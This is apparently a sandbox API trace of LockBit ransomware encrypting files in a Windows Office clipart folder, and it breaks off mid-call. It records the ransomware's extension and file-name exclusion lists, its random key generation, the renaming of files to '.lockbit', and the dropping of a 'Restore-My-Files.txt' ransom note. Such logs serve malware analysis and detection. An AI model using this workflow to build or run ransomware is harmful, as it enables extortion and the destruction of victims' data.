[0169.896] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0169.896] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0169.896] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0169.896] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0169.896] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0169.896] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0169.897] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0169.897] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0169.897] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0169.897] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02746G.GIF") returned 1 [0169.897] lstrcmpiW (lpString1="ntldr", lpString2="PH02746G.GIF") returned -1 [0169.897] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02746G.GIF") returned -1 [0169.898] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02746G.GIF") returned -1 [0169.898] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02746G.GIF") returned -1 [0169.898] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02746G.GIF") returned 1 [0169.898] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02746G.GIF") returned -1 [0169.898] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.898] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746G.GIF") returned=".GIF" [0169.898] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0169.898] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0169.898] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0169.898] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0169.898] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0169.899] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0169.899] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746G.GIF.lockbit") returned 72 [0169.899] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02746g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.900] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.900] malloc (_Size=0x40068) returned 0x3df0008 [0169.900] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24187) returned 1 [0169.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.902] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.902] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.913] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.913] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.913] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.915] free (_Block=0x1fa2ed8) [0169.915] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.915] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.915] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65001c00, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65001c00, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x7d84, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02746U.BMP", cAlternateFileName="")) returned 1 [0169.915] lstrcmpiW (lpString1=".", lpString2="PH02746U.BMP") returned -1 [0169.915] lstrcmpiW (lpString1="..", lpString2="PH02746U.BMP") returned -1 [0169.915] PathFindExtensionW (pszPath="PH02746U.BMP") returned=".BMP" [0169.915] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.915] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.915] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.915] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.915] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.916] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.916] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.916] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.916] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.917] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02746U.BMP") returned 1 [0169.917] lstrcmpiW (lpString1="ntldr", lpString2="PH02746U.BMP") returned -1 [0169.917] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02746U.BMP") returned -1 [0169.917] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02746U.BMP") returned -1 [0169.917] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02746U.BMP") returned -1 [0169.917] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02746U.BMP") returned 1 [0169.917] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02746U.BMP") returned -1 [0169.918] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.918] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746U.BMP") returned=".BMP" [0169.918] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.918] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.918] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.919] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.919] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.919] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.919] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.919] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746U.BMP.lockbit") returned 72 [0169.919] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02746u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.964] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.964] malloc (_Size=0x40068) returned 0x3df0008 [0169.964] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32132) returned 1 [0169.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.965] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.983] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.983] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0170.111] free (_Block=0x1fa2ed8) [0170.111] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0170.111] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0170.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0170.111] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd62df00, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd62df00, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x6090, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02748G.GIF", cAlternateFileName="")) returned 1 [0170.111] lstrcmpiW (lpString1=".", lpString2="PH02748G.GIF") returned -1 [0170.111] lstrcmpiW (lpString1="..", lpString2="PH02748G.GIF") returned -1 [0170.111] PathFindExtensionW (pszPath="PH02748G.GIF") returned=".GIF" [0170.111] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0170.111] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0170.111] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0170.111] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0170.111] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0170.111] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0170.111] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0170.112] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0170.112] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0170.112] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0170.112] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0170.112] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0170.112] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0170.112] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0170.112] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0170.112] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0170.113] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02748G.GIF") returned 1 [0170.113] lstrcmpiW (lpString1="ntldr", lpString2="PH02748G.GIF") returned -1 [0170.113] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02748G.GIF") returned -1 [0170.113] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02748G.GIF") returned -1 [0170.113] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02748G.GIF") returned -1 [0170.113] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02748G.GIF") returned 1 [0170.113] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02748G.GIF") returned -1 [0170.113] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0170.113] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748G.GIF") returned=".GIF" [0170.113] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0170.113] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0170.113] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0170.113] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0170.113] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0170.113] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0170.113] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0170.114] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0170.114] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0170.114] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0170.114] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0170.114] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0170.114] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0170.114] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0170.114] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0170.114] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0170.114] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748G.GIF.lockbit") returned 72 [0170.114] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02748g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0170.115] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0170.115] malloc (_Size=0x40068) returned 